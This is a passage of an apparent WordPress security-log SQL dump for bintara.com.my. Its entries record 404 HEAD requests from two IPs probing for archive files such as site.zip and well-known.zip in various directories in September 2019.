forward.http.proxy:3128\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/website/site.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/website/site.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5LInKlfXTtZ68oOVBXMwAAAUo\";s:12:\"REDIRECT_URL\";s:17:\"/website/site.zip\";s:11:\"REMOTE_ADDR\";s:15:\"103.133.215.103\";s:11:\"REMOTE_PORT\";s:5:\"52591\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/website/site.zip\";s:10:\"SCRIPT_URL\";s:17:\"/website/site.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5LInKlfXTtZ68oOVBXMwAAAUo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569606435.113\";s:12:\"REQUEST_TIME\";s:10:\"1569606435\";}}','notice','2019-09-27 17:48:17','2019-09-27 17:47:17',35518824,37324848,'http://bintara.com.my/website/site.zip',1,0,'103.133.215.103'),(23471,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-08-28 19:04:40','2019-08-28 19:04:36',17733920,18196648,'https://bintara.com.my/ibm/',1,0,'40.77.167.166'),(27172,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/2019/site.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"HTTP/1.1 forward.http.proxy:3128\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/2019/site.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/2019/site.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BTiwAAAI8\";s:12:\"REDIRECT_URL\";s:14:\"/2019/site.zip\";s:11:\"REMOTE_ADDR\";s:15:\"103.133.215.103\";s:11:\"REMOTE_PORT\";s:5:\"52594\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/2019/site.zip\";s:10:\"SCRIPT_URL\";s:14:\"/2019/site.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BTiwAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606435.3845\";s:12:\"REQUEST_TIME\";s:10:\"1569606435\";}}','notice','2019-09-27 17:48:17','2019-09-27 17:47:17',35519624,37321784,'http://bintara.com.my/2019/site.zip',1,0,'103.133.215.103'),(27173,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/2018/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/2018/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/2018/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt3KlfXTtZ68oOVBXWQAAAU4\";s:12:\"REDIRECT_URL\";s:20:\"/2018/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58840\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/2018/well-known.zip\";s:10:\"SCRIPT_URL\";s:20:\"/2018/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt3KlfXTtZ68oOVBXWQAAAU4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606585.1288\";s:12:\"REQUEST_TIME\";s:10:\"1569606585\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35515432,37316248,'http://bintara.com.my/2018/well-known.zip',1,0,'198.50.204.224'),(27174,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/2019/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/2019/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/2019/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt9s@3O4E744khfb8tAAAABA\";s:12:\"REDIRECT_URL\";s:20:\"/2019/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58847\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/2019/well-known.zip\";s:10:\"SCRIPT_URL\";s:20:\"/2019/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt9s@3O4E744khfb8tAAAABA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606584.8694\";s:12:\"REQUEST_TIME\";s:10:\"1569606584\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35515208,37307272,'http://bintara.com.my/2019/well-known.zip',1,0,'198.50.204.224'),(27175,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/beta/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/beta/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/beta/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt3HYVBlg0Ecqvi9URAAAAE4\";s:12:\"REDIRECT_URL\";s:20:\"/beta/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58926\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/beta/well-known.zip\";s:10:\"SCRIPT_URL\";s:20:\"/beta/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt3HYVBlg0Ecqvi9URAAAAE4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606584.9143\";s:12:\"REQUEST_TIME\";s:10:\"1569606584\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35514528,37309488,'http://bintara.com.my/beta/well-known.zip',1,0,'198.50.204.224'),(27176,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/new/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/new/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/new/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt3KlfXTtZ68oOVBXVwAAAUw\";s:12:\"REDIRECT_URL\";s:19:\"/new/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58817\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/new/well-known.zip\";s:10:\"SCRIPT_URL\";s:19:\"/new/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt3KlfXTtZ68oOVBXVwAAAUw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606584.8718\";s:12:\"REQUEST_TIME\";s:10:\"1569606584\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35516440,37321152,'http://bintara.com.my/new/well-known.zip',1,0,'198.50.204.224'),(27177,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/old/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/old/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/old/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt9s@3O4E744khfb8swAAABQ\";s:12:\"REDIRECT_URL\";s:19:\"/old/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58851\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/old/well-known.zip\";s:10:\"SCRIPT_URL\";s:19:\"/old/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt9s@3O4E744khfb8swAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606584.8712\";s:12:\"REQUEST_TIME\";s:10:\"1569606584\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35512192,37304336,'http://bintara.com.my/old/well-known.zip',1,0,'198.50.204.224'),(27178,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/v2/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/v2/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/v2/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt6TYgRwQdJ@9I7BTuwAAAIM\";s:12:\"REDIRECT_URL\";s:18:\"/v2/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58863\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/v2/well-known.zip\";s:10:\"SCRIPT_URL\";s:18:\"/v2/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt6TYgRwQdJ@9I7BTuwAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606584.6893\";s:12:\"REQUEST_TIME\";s:10:\"1569606584\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35518112,37322432,'http://bintara.com.my/v2/well-known.zip',1,0,'198.50.204.224'),(27179,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/test/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/test/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/test/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt3HYVBlg0Ecqvi9UQwAAAFA\";s:12:\"REDIRECT_URL\";s:20:\"/test/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58879\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/test/well-known.zip\";s:10:\"SCRIPT_URL\";s:20:\"/test/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt3HYVBlg0Ecqvi9UQwAAAFA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606584.9877\";s:12:\"REQUEST_TIME\";s:10:\"1569606584\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35515064,37308688,'http://bintara.com.my/test/well-known.zip',1,0,'198.50.204.224'),(27180,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/wp2/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/wp2/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/wp2/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt6TYgRwQdJ@9I7BTvAAAAIc\";s:12:\"REDIRECT_URL\";s:19:\"/wp2/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58866\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/wp2/well-known.zip\";s:10:\"SCRIPT_URL\";s:19:\"/wp2/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt6TYgRwQdJ@9I7BTvAAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606584.4045\";s:12:\"REQUEST_TIME\";s:10:\"1569606584\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35515456,37320696,'http://bintara.com.my/wp2/well-known.zip',1,0,'198.50.204.224'),(27181,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/news/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 